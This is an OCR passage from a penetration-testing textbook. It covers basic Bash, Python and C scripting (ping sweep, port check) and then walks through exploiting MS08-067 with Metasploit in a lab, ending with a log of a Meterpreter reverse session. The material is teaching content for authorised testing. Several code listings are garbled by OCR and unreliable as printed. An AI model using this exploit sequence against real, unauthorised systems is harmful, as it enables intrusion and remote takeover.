64 bytes from 192.168.20.10: icmp_req=3 ttl=64 time=0.038 ms
64 bytes from 192.168.20.10: icmp_req=4 ttl=64 time=0.050 ms

e

--- 192.168.20.10 ping statistics ---

4 packets transmitted, 4 received, 0% packet loss, time 2999 ms
rtt min/avg/max/mdev = 0.029/0.051/0.090/0.024 ms

Listing 3-1: Pinging a remote host

We can tell from the ping output that the Windows XP target is up
and responding to ping probes because we received replies to our ICMP
requests. (The trouble with ping is that it will keep running forever unless
you stop it with cTRL-C.)

A Simple Bash Script

Let’s begin writing a simple Bash script to ping hosts on the network. A good
place to start is by adding some help information that tells your users how
to run your script correctly.

#!/bin/bash
echo "Usage: ./pingscript.sh [network]"
echo "example: ./pingscript.sh 192.168.20"

The first line of this script tells the terminal to use the Bash interpreter.
The next two lines that begin with echo simply tell the user that our ping
script will take a command line argument (network), telling the script which
network to ping sweep (for example, 192.168.20). The echo command will
simply print the text in quotes.

This script implies we are working with a class C network, where the first three octets
of the IP address make up the network.

After creating the script, use chmod to make it executable so we can run it.

root@kali:~/# chmod 744 pingscript.sh




Running Our Script

Previously, when entering Linux commands, we typed the command
name at the prompt. The filesystem location of built-in Linux commands
as well as pentest tools added to Kali Linux are part of our PATH environ-
mental variable. The PATH variable tells Linux which directories to search
for executable files. To see which directories are included in our PATH,
enter echo $PATH.

root@kali:~/# echo $PATH
/usr/local/sbin:/usr/local/bin:/usx/sbin:/usr/bin:/sbin:/bin

Notice in the output that the /root directory is not listed. That means that
we won’t be able to simply enter pingscript.sh to run our Bash script. Instead
we’ll enter ./pingscript.sh to tell the terminal to run the script from our
current directory. As shown next, the script prints the usage information.

root@kali:~/# ./pingscript.sh
Usage: ./pingscript.sh [network]
example: ./pingscript.sh 192.168.20

Adding Functionality with if Statements

Now let’s add in a bit more functionality with an if statement, as shown in
Listing 3-2.

#!/bin/bash

if[ "$1" =""]1©

then @

echo "Usage: ./pingscript.sh [network]"
echo "example: ./pingscript.sh 192.168.20"
fi®

Listing 3-2: Adding an if statement

Typically a script needs to print usage information only if the user
uses it incorrectly. In this case, the user needs to supply the network to
scan as a command line argument. If the user fails to do so, we want to
inform the user how to run our script correctly by printing the usage
information.

To accomplish this, we can use an if statement to see if a condition is
met. By using an if statement, we can have our script echo the usage infor-
mation only under certain conditions—for example, if the user does not
supply a command line argument.

The if statement is available in many programming languages, though
the syntax varies from language to language. In Bash scripting, an if state-
ment is used like this: if [condition], where condition is the condition that
must be met.
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In the case of our script, we first see whether the first command line
argument is null @. The symbol $1 represents the first command line argu-
ment in a Bash script, and double equal signs (==) check for equality. After
the if statement, we have a then statement @. Any commands between the
then statement and the fi (if backward) © are executed only if the condi-
tional statement is true—in this case, when the first command line argu-
ment to the script is null.

When we run our new script with no command line argument, the if
statement evaluates as true, because the first command line argument is
indeed null, as shown here.

root@kali:~/# ./pingscript.sh
Usage: ./pingscript.sh [network]
example: ./pingscript.sh 192.168.20

As expected we see usage information echoed to the screen.

A for Loop

If we run the script again with a command line argument, nothing hap-
pens. Now let’s add some functionality that is triggered when the user runs
the script with the proper arguments, as shown in Listing 3-3.

#!/bin/bash

if [ "$1" == "" ]

then

echo "Usage: ./pingscript.sh [network]"
echo "example: ./pingscript.sh 192.168.20"
else ©

for x in “seq 1 254" ; do @

ping -c 1 $1.$x

done ©

fi

Listing 3-3: Adding a for loop

After our then statement, we use an else statement @ to instruct the
script to run code when the if statement evaluates as false—in this case, if
the user supplies a command line argument. Because we want this script
to ping all possible hosts on the local network, we need to loop through
the numbers 1 through 254 (the possibilities for the final octet of an
IP version 4 address) and run the ping command against each of these
possibilities.

An ideal way to run through sequential possibilities is with a for loop @.
Our for loop, for x in “seq 1 254°; do, tells the script to run the code that
follows for each number from 1 to 254. This will allow us to run one set of
instructions 254 times rather than writing out code for each instance. We
denote the end of a for loop with the instruction done ©.



Inside the for loop, we want to ping each of the IP addresses in the net-
work. Using ping’s man page, we find that the -c option will allow us to limit
the number of times we ping a host. We set -c to 1 so that each host will be
pinged just once.

To specify which host to ping, we want to concatenate the first command
line argument (which denotes the first three octets) with the current itera-
tion of the for loop. The full command to use is ping -c 1 $1.$x. Recall
that the $1 denotes the first command line argument, and $x is the cur-
rent iteration of the for loop. The first time our for loop runs, it will ping
192.168.20.1, then 192.168.20.2, all the way to 192.168.20.254. After itera-
tion 254, our for loop finishes.

When we run our script with the first three octets of our IP address as
the command line argument, the script pings each IP address in the net-
work as shown in Listing 3-4.

root@kali:~/# ./pingscript.sh 192.168.20
PING 192.168.20.1 (192.168.20.1) 56(84) bytes of data.
64 bytes from 192.168.20.1: icmp_req=1 ttl=255 time=8.31 ms @

--- 192.168.20.1 ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time oOms
rtt min/avg/max/mdev = 8.317/8.317/8.317/0.000 ms

PING 192.168.20.2(192.168.20.2) 56(84) bytes of data.

64 bytes from 192.168.20.2: icmp_req=1 ttl=128 time=166 ms

--- 192.168.20.2 ping statistics ---

1 packets transmitted, 1 received, 0% packet loss, time oOms
rtt min/avg/max/mdev = 166.869/166.869/166.869/0.000 ms

PING 192.168.20.3 (192.168.20.3) 56(84) bytes of data.

From 192.168.20.13 icmp_seq=1 Destination Host Unreachable @

--- 192.168.20.3 ping statistics ---
1 packets transmitted, 0 received, +1 errors, 100% packet loss, time Oms
--snip--

Listing 3-4: Running the ping sweep script

Your results will vary based on the systems in your local network. Based
on this output, I can tell that in my network, the host 192.168.20.1 is up, and
I received an ICMP reply @. On the other hand, the host 192.168.20.3 is not
up, so I received a host unreachable notification @.

Streamlining the Results

All this information printed to screen is not very nice to look at, and anyone
who uses our script will need to sift through a lot of information to deter-
mine which hosts in the network are up. Let’s add some additional func-
tionality to streamline our results.
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In the previous chapter we covered grep, which searches for and
matches specific patterns. Let’s use grep to filter the script’s output, as
shown in Listing 3-5.

#!/bin/bash

if [ "$17 == "7 ]

then

echo "Usage: ./pingscript.sh [network]
echo "example: ./pingscript.sh 192.168.20"
else

for x in “seq 1 254°; do

ping -c 1 $1.$x | grep "64 bytes" @

done

fi

Listing 3-5: Using grep to filter results

Here we look for all instances of the string 64 bytes @, which occurs
when an ICMP reply is received when pinging a host. If we run the script
with this change, we see that only lines that include the text 64 bytes are
printed to the screen, as shown here.

root@kali:~/# ./pingscript.sh 192.168.20

64 bytes from 192.168.20.1: icmp_req=1 tt1l=255 time=4.86 ms
64 bytes from 192.168.20.2: icmp_req=1 tt1=128 time=68.4 ms
64 bytes from 192.168.20.8: icmp_req=1 ttl=64 time=43.1 ms
--snip--

We get indicators only for live hosts; hosts that do not answer are not
printed to the screen.

But we can make this script even nicer to work with. The point of our
ping sweep is to get a list of live hosts. By using the cut command discussed
in Chapter 2, we can print the IP addresses of only the live hosts, as shown in
Listing 3-6.

#!/bin/bash

if [ "$17 == "7 ]

then

echo "Usage: ./pingscript.sh [network]
echo "example: ./pingscript.sh 192.168.20"

else

for x in “seq 1 254°; do

ping -c 1 $1.$x | grep "64 bytes" | cut -d" " -f4 @
done

fi

Listing 3-6: Using cut to further filter results

We can use a space as the delimiter and grab the fourth field, our IP
address, as shown at @.



Now we run the script again as shown here.

root@kali:~/mydirectory# ./pingscript.sh 192.168.20
192.168.20.1:

192.168.20.2:

192.168.20.8:

--snip--

Unfortunately, we see a trailing colon at the end of each line. The results
would be clear enough to a user, but if we want to use these results as input
for any other programs, we need to delete the trailing colon. In this case,
sed is the answer.

The sed command that will delete the final character from each line is
sed 's/.$//', as shown in Listing 3-7.

#!/bin/bash

if [ 517 == ]

then

echo "Usage: ./pingscript.sh [network]"

echo "example: ./pingscript.sh 192.168.20"

else

for x in “seq 1 2547; do

ping -c 1 $1.$x | grep "64 bytes" | cut -d" " -f4 | sed 's/.$//'
done

fi

Listing 3-7: Using sed to drop the trailing colon

Now when we run the script, everything looks perfect, as shown here.

root@kali:~/# ./pingscript.sh 192.168.20
192.168.20.1

192.168.20.2

192.168.20.8

--snip--

Of course, if we want to output the results to a file instead of to the screen, we can use
the >> operator, covered in Chapter 2, to append each live IP address to a file. Try
automating other tasks in Linux to practice your Bash scripting skills.

Python Scripting

Linux systems typically come with interpreters for other scripting languages
such as Python and Perl. Interpreters for both languages are included in
Kali Linux. In Chapters 16 through 19, we’ll use Python to write our own
exploit code. For now, let’s write a simple Python script and run it in Kali
Linux just to demonstrate the basics of Python scripting.
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For this example we’ll do something similar to our first Netcat example
in Chapter 2: We’ll attach to a port on a system and see if the port is listen-
ing. A starting point for our script is shown here.

#!/usr/bin/python @
ip = raw_input("Enter the ip:
port = input("Enter the port:

) ®
ll) 9

In the previous section, the first line of our script told the terminal to
use Bash to interpret the script. We do the same thing here, pointing to the
Python interpreter installed on Kali Linux at /usr/bin/python ®©.

We’ll begin by prompting the user for data and recording input into
variables. The variables will store the input for use later in the script. To
take input from the user, we can use the Python function raw_input @. We
want to save our port as an integer, so we use a similar built-in Python func-
tion, input, at ®. Now we ask the user to input an IP address and a port to test.

After saving the file, use chmod to make the script executable before run-
ning the script, as shown here.

root@kali:~/mydirectory# chmod 744 pythonscript.py
root@kali:~/mydirectory# ./pythonscript.py

Enter the ip: 192.168.20.10

Enter the port: 80

When you run the script, you're prompted for an IP address and a port,
as expected.

Now we will add in some functionality to allow us to use the user’s input
to connect to the chosen system on the selected port to see if it is open
(Listing 3-8).

#!/usr/bin/python
import socket @
ip = raw_input("Enter the ip: ")
port = input("Enter the port: ")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) @
if s.connect_ex((ip, port)): ©
print "Port", port, "is closed" @
else: ©
print "Port", port, "is open"

Listing 3-8: Adding port-scanning functionality

To perform networking tasks in Python, we can include a library called
socket using the command import socket @. The socket library does the heavy
lifting for setting up a network socket.

The syntax for creating a TCP network socket is socket.socket(socket.AF_
INET, socket.SOCK_STREAM). We set a variable equal to this network socket at @.



NOTE

Connecting to a Port

When creating a socket to connect to a remote port, the first candidate
available from Python is the socket function connect. However, there is

a better candidate for our purposes in the similar function, connect_ex.
According to the Python documentation, connect_ex is like connect except
that it returns an error code instead of raising an exception if the connec-
tion fails. If the connection succeeds, connect_ex will return the value o.
Because we want to know whether the function can connect to the port,
this return value seems ideal to feed into an if statement.

if Statements in Python

When building if statements in Python, we enter if condition:. In Python the
statements that are part of a conditional or loop are denoted with inden-
tations rather than ending markers, as we saw in Bash scripting. We can
instruct our if statement to evaluate the returned value of the connection
of our TCP socket to the user-defined IP address and port with the com-
mand if s.connect_ex((ip, port)): @. If the connection succeeds, connect_ex
will return 0, which will be evaluated by the if statement as false. If the con-
nection fails, connect_ex will return a positive integer, or true. Thus, if our if
statement evaluates as true, it stands to reason that the portis closed, and
we can present this to the user using the Python print command at @. And,
as in the Bash scripting example, if connect_ex returns 0 at @, we can use an
else statement (the syntax is else: in Python) to instead inform the user
that the tested port is open.

Now, run the updated script to test whether TCP port 80 is running on
the Windows XP target host as shown here.

root@kali:~/# ./pythonscript.py
Enter the ip: 192.168.20.10
Enter the port: 80

Port 80 is open

According to our script, port 80 is open. Now run the script again
against port 81.

root@kali:~/# ./pythonscript.py
Enter the ip: 192.168.20.10
Enter the port: 81

Port 81 is closed

This time, the script reports that port 81 is closed.

We will look at checking open ports in Chapter 5, and we will return to Python script-
ing when we study exploit development. Kali Linux also has interpreters for the Perl
and Ruby languages. We will learn a little bit of Ruby in Chapter 19. It never hurts
to know a little bit of multiple languages. If you are wp for a challenge, see if you can
re-create this script in Perl and Ruby.
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Time for one more simple programming example, this time in the C pro-
gramming language. Unlike scripting languages such as Bash and Python,
C code must be compiled and translated into machine language that the
CPU can understand before it is run.

Kali Linux includes the GNU Compiler Collection (GCC), which will
allow us to compile C code to run on the system. Let’s create a simple C pro-
gram that says hello to a command line argument, as shown in Listing 3-9.

#include <stdio.h> @
int main(int argc, char *argv[]) @

{
if(argc < 2) ©
printf("%s\n", "Pass your name as an argument"); @
return 0; ©
}
else
{
printf("Hello %s\n", argv[1]); ®
return 0;
}
}

Listing 3-9: “Hello World” C program

The syntax for C is a bit different from that of Python and Bash. Because
our code will be compiled, we don’t need to tell the terminal which inter-
preter to use at the beginning of our code. First, as with our Python example,
we import a C library. In this case we’ll import the stdio (short for standard
input and output) library, which will allow us to accept input and print
output to the terminal. In C, we import stdio with the command #include
<stdio.h> @.

Every C program has a function called main @ that is run when the
program starts. Our program will take a command line argument, so we
pass an integer argc and a character array argv to main. argc is the argument
count, and argv is the argument vector, which includes any command line
arguments passed to the program. This is just standard syntax for C pro-
grams that accept command line arguments. (In C, the beginning and end
of functions, loops, and so on are denoted by braces {}.)

First, our program checks to see if a command line argument is pres-
ent. The argc integer is the length of the argument array; if it is less than
two (the program name itself and the command line argument), then a
command line argument has not been given. We can use an if statement
to check ®.

The syntax for if is also a little different in C. As with our Bash script, if
a command line argument is not given, we can prompt the user with usage
information @. The printf function allows us to write output to the termi-
nal. Also note that statements in C are finished with a semicolon (;). Once



we're through with our program, we use a return statement @ to finish the
function main. If a command line argument is supplied, our else statement
instructs the program to say hello ®. (Be sure to use braces to close all of
your loops and the main function.)

Before we can run our program, we need to compile it with GCC as
shown here. Save the program as cprogram.c.

root@kali:~# gcc cprogram.c -o cprogram

Use the -o option to specify the name for the compiled program and
feed your C code to GCC. Now run the program from your current direc-
tory. If the program is run with no arguments, you should see usage infor-
mation as shown here.

root@kali:~# ./cprogram
Pass your name as an argument

If instead we pass it an argument, in this case our name, the program
tells us hello.

root@kali:~# ./cprogram georgia
Hello georgia

We will look at another C programming example in Chapter 16, where a little bit of
sloppy C coding leads to a buffer overflow condition, which we will exploit.

Summary

In this chapter we’ve looked at simple programs in three different languages.
We looked at basic constructs, such as saving information in variables for
later use. Additionally, we learned how to use conditionals, such as if state-
ments, and iterations, such as for loops, to have the program make decisions
based on the provided information. Though the syntax used varies from pro-
gramming language to programming language, the ideas are the same.
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USING THE
METASPLOIT FRAMEWORK

In subsequent chapters, we’ll take an in-depth look at
the phases of penetration testing, but in this chapter,
we’ll dive right in and get some hands-on experience
with exploitation. Though the information-gathering
and reconnaissance phases often have more bear-
ing on a pentest’s success than exploitation does, it’s
more fun to gather shells (a remote connection to

an exploited target) or trick users into entering their
company credentials into your cloned website.

In this chapter we’ll work with the Metasploit Framework, a tool that
has become the de facto standard for penetration testers. First released in
2003, Metasploit has reached cult status in the security community. Though
Metasploit is now owned by the security company Rapid?7, an open source
edition is still available, with development largely driven by the security
community.



Metasploit’s modular and flexible architecture helps developers effi-
ciently create working exploits as new vulnerabilities are discovered. As
you'll see, Metasploit is intuitive and easy to use, and it offers a centralized
way to run trusted exploit code that has been vetted for accuracy by the
security community.

Why use Metasploit? Say you've discovered a vulnerability in your client
environment—the Windows XP system at 192.168.20.10 is missing Microsoft
security bulletin MS08-067. As a penetration tester, it is up to you to exploit
this vulnerability, if possible, and assess the risk of a compromise.

One approach might be to set up in your lab a Windows XP system that
is also missing this patch, attempt to trigger the vulnerability, and develop a
working exploit. But developing exploits by hand takes both time and skill,
and the window of opportunity for your pentest may be closing.

You could instead search for code that exploits this vulnerability on
the Internet. Sites like Packet Storm Security (Attp://www.packetstormsecurity
.com/), SecurityFocus (http://www.securityfocus.com/), and Exploit Database
(http://www.exploit-db.com/) provide repositories of known exploit code.
But be forewarned: Not all public exploit code does what it claims to do.
Some exploit code may destroy the target system or even attack your system
instead of the target. You should always be vigilant when running anything
you find online and read through the code carefully before trusting it. Addi-
tionally, the public exploits you find may not meet your needs right out of
the box. You may need to do some additional work to port them to your
pentest environment.

Whether we develop an exploit from scratch or use a public one as a
base, we will still need to get that exploit to work on your pentest. Our time
will probably be better spent on tasks that are difficult to automate, and
luckily, we can use Metasploit to make exploiting known vulnerabilities
such as MS08-067 quick and painless.

Starting Metasploit

Chapter 4

Let’s start Metasploit and attack our first system. In Kali Linux, Metasploit
is in our path, so we can start it anywhere on the system. But before you
start Metasploit, you will want to start the PostgreSQL database, which
Metasploit will use to track what you do.

root@kali:~# service postgresql start

Now you’re ready to start the Metasploit service. This command creates
a PostgreSQL user called msf3 and a corresponding database to store our
data. It also starts Metasploit’s remote procedure call (RPC) server and web
server.

root@kali:~# service metasploit start




There are multiple interfaces for using Metasploit. In this chapter
we’ll use Msfconsole, the Metasploit text-based console, and Msfcli, the
command line interface. Either interface can be used to run Metasploit
modules, though I tend to spend most of my time in Msfconsole. Start the
console by entering msfconsole.

root@kali:~# msfconsole

Don’t be alarmed if Msfconsole appears to hang for a minute or two;
it’s loading the Metasploit module tree on the fly. Once it’s finished, you’ll
be greeted by some clever ASCII art, a version listing and other details, and
an msf > prompt (see Listing 4-1).

\
((_"'Jn"'_))
(o0
\ \
oo\ MSF \

Large pentest? List, sort, group, tag and search your hosts and services
in Metasploit Pro -- type 'go pro' to launch it now.

=[ metasploit v4.8.2-2014010101 [core:4.8 api:1.0]

+ -- --=[ 1246 exploits - 678 auxiliary - 198 post
+ -- --=[ 324 payloads - 32 encoders - 8 nops
msf >

Listing 4-1: Starting Msfconsole

Notice in Listing 4-1 that, as of this writing, Metasploit had 1,246 exploits,
678 auxiliary modules, and so forth. No doubt by the time you read this,
these numbers will be even larger. New modules are always being added to
Metasploit, and because Metasploit is a community-driven project, anyone
can submit modules for inclusion in the Metasploit Framework. (In fact, in
Chapter 19, you'll learn how to write your own modules and gain immortal-
ity as a Metasploit author.)

If you're ever stuck when using Msfconsole, enter help for a list of avail-
able commands and a description of what they do. For more detailed infor-
mation about a specific command, including usage, enter help <command name>.

For example, the help information for using Metasploit’s route com-
mand is shown in Listing 4-2.
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msf > help route
Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]

Route traffic destined to a given subnet through a supplied session.
The default comm is Local...

Listing 4-2: Help information in Metasploit

Finding Metasploit Modules

Chapter 4

Let’s look at how we might use Metasploit to exploit an unpatched vulnera-
bility in our Windows XP target. We will exploit the vulnerability patched
in Microsoft Security Bulletin MS08-067. A natural question you may have
is, how do we know this patch is missing on our Windows XP target? In
subsequent chapters, we will walk through the steps of discovering this vul-
nerability as well as several others on our target systems. For now, just trust
me that this is the vulnerability we would like to exploit.

MS08-067 patched an issue in the netapi32.dll that could allow attack-
ers to use a specially crafted remote procedure call request via the Server
Message Block (SMB) service to take over a target system. This vulnerability
is particularly dangerous because it does not require an attacker to authen-
ticate to the target machine before running the attack. MS08-067 gained
eternal infamy as the vulnerability exploited by the Conficker worm, which
was widely reported in the media.

Now, if you're familiar with Microsoft patches, you may recognize that
this one is from 2008. Considering its age, you may be surprised to learn
how often the vulnerability it patched can still lead to success in penetra-
tion testing, even today, particularly when assessing internal networks.
Metasploit’s MS08-067 module is simple to use and has a high success rate,
making it an ideal first example. Our first step in using Metasploit is to find
a module that exploits this particular vulnerability. We have a few options.
Usually, a simple Google search will find what you need, but Metasploit
also has an online database of modules (hitp://www.rapid7.com/db/modules/)
and a built-in search function that you can use to search for the correct
modules.

The Module Database

You can use the Metasploit search page to match Metasploit modules to
vulnerabilities by Common Vulnerabilities and Exposures (CVE) num-
ber, Open Sourced Vulnerability Database (OSVDB) ID, Bugtraq ID, or
Microsoft Security Bulletin, or you can search the full text of the module
information for a string. Search for MS08-067 in the Microsoft Security
Bulletin ID field, as shown in Figure 4-1.



Figure 4-1: Searching the Metasploit Auxiliary Module & Exploit Database

The results of the search, shown in Figure 4-2, tell us the module name
we need as well as information about the module (which we’ll discuss in the
next section).

Figure 4-2: MS08-067 Metasploit module page

The full name of the Metasploit module for the MS08-067 security
bulletin is shown in the URI bar. In the modules directory of Metasploit,
this exploit is exploit/windows/smb/ms08_067_netapi.

Built-In Search

You can also use Metasploit’s built-in search function to find the correct
module name, as shown in Listing 4-3.
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msf > search ms08-067

Matching Modules

Name

Disclosure Date Rank

Description

exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great Microsoft Server

Service Relative Path
Stack Corruption

Listing 4-3: Searching for a Metasploit module
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Again we find that the correct module name for this vulnerability
is exploit/windows/smb/ms08_067_netapi. Once you've identified a mod-
ule to use, enter the info command with the module name, as shown in

Listing 4-4.

mst > info exploit/windows/smb/ms08_067_netapi

OName:
®Module:
Version:
©Platform:
OPrivileged:
License:
©Rank:

Microsoft Server Service Relative Path Stack Corruption

exploit/windows/smb/ms08_067_netapi
0

Windows

Yes

Metasploit Framework License (BSD)
Great

@ Available targets:

Id Name

0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal

--snip--

67 Windows 2003 SP2 Spanish (NX)

@ Basic options:

Name Current Setting Required Description

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

O Payload information:

Space: 400

Avoid: 8 characters

© Description:

This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP



targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.

® References:
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

Listing 4-4: Information listing in Metasploit

This info page tells us a lot.

e First we see some basic information about the module, including a
descriptive name at @ followed by the module name at ®. (The version
field formerly denoted the SVN revision for the module, but now that
Metasploit is hosted on GitHub, all modules are set to version 0.)

e Platform © tells us that this exploit is for Windows systems.

e Privileged @ tells us whether this module requires or grants high privi-
leges on the target. The License is set to Metasploit Framework License
(BSD). (Metasploit’s license is a three-clause BSD open source license.)

e Rank @ lists the exploit’s potential impact on the target. Exploits are
ranked from manual to excellent. An exploit ranked excellent should
never crash a service; memory-corruption vulnerabilities such as
MS08-067 are usually not in this category. Our module is in the great
category, one step down. A great exploit can automatically detect
the correct target and has other features that make it more likely to
succeed.

e Available targets @ lists operating system versions and patch levels that
the module can exploit. This module has 67 possible targets, including
Windows 2000, Windows 2003, and Windows XP, as well as multiple ser-
vice and language packs.

e Basic options @ lists various options for the module that can be set to
make a module better meet our needs. For example, the RHOST option
tells Metasploit the IP address of the target. (We’ll discuss the basic
options in depth in “Setting Module Options” on page 94.)

e Payload information ® contains information to help Metasploit decide
which payloads it can use with this exploit. Payloads, or shellcode, tell
the exploited system what to do on behalf of the attacker. (The goal of
attacking a target is, of course, to get it to do something on our behalf
that it isn’t supposed to do.) Metasploit’s payload system gives us many
options for what to make the target do.

e Description @ includes more details about the particular vulnerability
that the module exploits.

e References @ contains a link to online vulnerability database entries. If
you're ever in doubt about which Metasploit module to use for a vulner-
ability, start with its info page.
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Having confirmed that this is the right module, tell Metasploit to use
this module with the command use windows/smb/ms08 067_netapi. You can
drop the exploit/ part of the exploit name; Metasploit will figure out what
you want.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Now we’re in the context of the exploit module.

Setting Module Options

Chapter 4

Having chosen our exploit, we need to give Metasploit some informa-
tion. As you’ll see throughout this book, Metasploit can aid you in many
aspects of penetration testing, but it isn’t a mind reader . . . yet. To see the
information Metasploit needs from you to run your chosen module, enter
show options (Listing 4-5).

msf exploit(mso8_067_netapi) > show options

Module options (exploit/windows/smb/ms08 067 netapi):

Name Current Setting Required Description
ORHOST yes The target address
@®RPORT 445 yes Set the SMB service port
©SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:
Id Name

®0 Automatic Targeting

msf exploit(mso8_067_netapi) >

Listing 4-5: Exploit module options

At the top of the output shown in Listing 4-5 are the module settings
and any default values, whether certain settings are required for the mod-
ule to run successfully, and a description of each setting.

RHOST

The RHOST option @ refers to the remote host we want to exploit. This
option is required because it gives Metasploit a target to attack. We’ll

tell Metasploit to exploit the Windows XP target machine that we set up
in Chapter 1 by changing the RHOST option from blank to our target IP
address. (If you can’t remember what that is, on the Windows XP machine



run ipconfig at the command line to find out.) To set an option enter set
<option to set> <value to set it to>, so in this case, set RHOST 192.168.20.10.
(Remember to use your own Windows XP target’s IP address.) After issuing
this command, running show options again should show that the value of
RHOST is set to 192.168.20.10.

RPORT

RPORT @ refers to the remote port to attack. I remember a former manager
of mine who spent a good amount of time looking for port 80—as in try-
ing to locate it physically. Unsatisfied with my explanation that networking
sockets are made entirely of code, I eventually just pointed at the Ethernet
port. The moral of this story is this: A port is just a network socket; it’s not a
physical port. For example, when you browse to www.google.com, a web server
somewhere on the Internet is listening on port 80.

In this case we see that RPORT is set to a default value. Because our exploit
uses the Windows SMB service, the RPORT value should probably be 445, the
default port for SMB. And, as you can see, Metasploit saves us the trouble of
having to set the value by setting the default to 445 (which you can change
if you need to). In our case, we can just leave it alone.

SMBPIPE

Like the RPORT value, keep the default for the SMBPIPE option @ as BROWSER.
This will work just fine for our purposes. (SMB pipes allow us to talk to
Windows interprocess communication over a network. We’ll look at find-
ing out which SMB pipes are listening on our target machines later in this
chapter.)

Exploit Target

The Exploit Target is set to 0 Automatic Targeting @. This is the target oper-
ating system and version. You can view the available targets on the module’s
info page or just show them with the command show targets (Listing 4-6).

msf exploit(mso8_067 netapi) > show targets
Exploit targets:

Id Name
Automatic Targeting
Windows 2000 Universal
Windows XP SP0/SP1 Universal
Windows XP SP2 English (AlwaysOn NX)
Windows XP SP2 English (NX)
5 Windows XP SP3 English (AlwaysOn NX)
--snip--
67 Windows 2003 SP2 Spanish (NX)

AW NER O

Listing 4-6: Exploit targets

Using the Metasploit Framework 95



As you can see in Listing 4-6, this module can attack Windows 2000,
Windows 2003, and Windows XP.

Remember, Microsoft has released patches for all the platforms affected by this bug,
but keeping all systems in an environment up-to-date with Windows patches is easier
said than done. Many of your pentesting clients will be missing some critical updates
in Windows and other software.

We know that our target is running Windows XP SP3 English, so we can
wager that the correct target number is either 5 or 6, but it won’t always be
so easy. Choose Automatic Targeting to tell Metasploit to fingerprint the SMB
service and choose the appropriate target based on the results.

To set a target option, enter set target <target number>.In this case we’ll
leave the module target at the default Automatic Targeting and move on.

Payloads (or Shellcode)

Based on the output of show options command, it looks like everything should
be ready to go at this point, but we’re not quite done yet. We’ve forgotten to
tell our exploit what to do once the target has been exploited. One of the
ways that Metasploit makes things easier is by setting up our payloads for us.
Metasploit has a plethora of payloads, ranging from simple Windows com-
mands to the extensible Metasploit Meterpreter (see Chapter 13 for more
detailed information on Meterpreter). Just select a compatible payload, and
Metasploit will craft your exploit string, including the code to trigger the
vulnerability and the payload to run after exploitation is successful. (We’ll
look at writing exploits by hand in Chapters 16 through 19.)

Finding Compatible Payloads

As of this writing there were 324 payloads in Metasploit, and like exploit
modules, new payloads are added to the Framework regularly. For instance,
as mobile platforms take over the world, payloads for iOS and other smart-
phones are starting to show up in Metasploit. But, of course, not all 324 pay-
loads are compatible with our chosen exploit. Our Windows system will be a
bit confused if it receives instructions that are meant for an iPhone. To see
compatible payloads, enter show payloads, as shown in Listing 4-7.

msf exploit(mso8_067_netapi) > show payloads

Compatible Payloads
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Name Disclosure Date Rank Description
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP
Inline
Chapter 4



generic/shell reverse_tcp

generic/tight_loop
windows/dllinject/bind_ipv6_tcp

windows/dllinject/bind_nonx_tcp
windows/dllinject/bind_tcp
windows/dllinject/reverse_http

--snip--

windows/vncinject/reverse ipvé_http

windows/vncinject/reverse_ipvé_tcp

--snip--
windows/vncinject/reverse_tcp

windows/vncinject/reverse_tcp_allports

windows/vncinject/reverse_tcp dns

normal

normal
normal

normal

normal

normal

normal

normal

normal

normal

normal

Generic Command Shell, Reverse
Inline

Generic x86 Tight Loop

Reflective DLL Injection, Bind
TCP Stager (IPv6)

Reflective DLL Injection, Bind
TCP Stager (No NX or Win7)
Reflective DLL Injection, Bind

TCP Stager
Reflective DLL Injection, Reverse
HTTP Stager

VNC Server (Reflective Injection),
Reverse HTTP Stager (IPv6)

VNC Server (Reflective Injection),
Reverse TCP Stager (IPv6)

VNC Server (Reflective Injection),
Reverse TCP Stager

VNC Server (Reflective Injection),
Reverse All-Port TCP Stager

VNC Server (Reflective Injection),
Reverse TCP Stager (DNS)

Listing 4-7: Compatible payloads

If you forget to set a payload, you may find that, miraculously, the exploit
module will just choose the default payload and associated settings and run
it anyway. Still, you should get in the habit of manually setting a payload and
its options because the default won’t always fit your needs.

A Test Run

Let’s keep things simple and send off our exploit with the default payload
options first, just to see how things work. Enter exploit to tell Metasploit to
run the module, as shown in Listing 4-8.

msf exploit(mso8 067 netapi) > exploit

*
*
*
*

*
*

meterpreter >

[*] Started reverse handler on 192.168.20.9:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English

[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)

[*] Attempting to trigger the vulnerability...

[*] Sending stage (752128 bytes) to 192.168.20.10

[*] Meterpreter session 1 opened (192.168.20.9:4444 -> 192.168.20.10:1334) at
2015-08-31 07:37:05 -0400

Listing 4-8: Running the exploit
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As you can see, we end up with a Meterpreter session. Meterpreter is
short for meta-interpreter, Metasploit’s unique payload. I often describe it as
a shell on steroids. It can do everything a command shell can do and much,
much more. We’ll cover Meterpreter in depth in Chapter 13, but to geta
head start, enter help in the Meterpreter console for a list of Meterpreter’s
commands.

Another thing to note about the default options is that Metasploit uses the port 4444.
In our lab there is nothing wrong with this. It will work just fine. However, on real
engagements, if your client is using even primitive intrusion-prevention software, it
may take note of traffic on port 4444 and say, “Hey, you are Metasploit, go away!”
and drop your connection.

For now, let’s close our Meterpreter session and learn more about select-
ing payloads manually. As useful as Meterpreter is, you may find yourself
in situations where it is not the ideal payload to meet your needs. Type exit
into your Meterpreter prompt to return to the regular Metasploit console.

meterpreter > exit
[*] Shutting down Meterpreter...

[*] Meterpreter session 1 closed. Reason: User exit
msf exploit(mso8 067 netapi) >

